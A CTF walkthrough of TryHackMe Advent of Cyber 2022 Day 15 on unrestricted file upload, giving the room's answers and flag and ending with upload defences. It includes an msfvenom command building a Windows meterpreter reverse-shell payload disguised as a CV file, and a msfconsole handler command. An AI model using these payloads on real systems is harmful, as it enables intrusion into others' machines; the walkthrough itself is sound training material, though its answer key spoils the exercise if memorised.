Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.
Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.
Start the Machine and Paste the IP of the Machine into a Browser!
If Needed, Connect with the TryHackMe’s VPN
With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF)
Ans: Unrestricted
Ans: Santasidekick2
Just Upload a Dummy File!!
cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!
The Above Message ensures that a Person will Review the File, So we can Upload a Payload and wait for the Interaction
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe
Let’s Start the Reverse Handler!!
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"
Let’s Upload the Payload we Created in Home Directory to the Website and Wait for the Interaction!!
We Got the Reverse Connection!!
Now Let’s Exploit
We are in the system32 Directory so, let’s move back to C: Directory
cd ..
cd ..
cd Users
cd HR_Elf
cd Documents
cat flag.txt
Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}
To ensure that specific file types can be uploaded, We can verify the file extension. This will allow us to limit the type of files that can be uploaded.
Ans: file Extension validation
Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.
To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name
Ans: File Renaming
There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!
In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file
Ans: Malware Scanning
Thank you for Reading!!
Happy Hacking ~
Queries:
THM , TryHackMe , TryHackMe Advent of Cyber 2022 , TryHackMe Advent of Cyber 4 Day 15, Ethical Hacking , Write up , Walk through , TryHackMe Advent of Cyber 2022 Day 15 Answers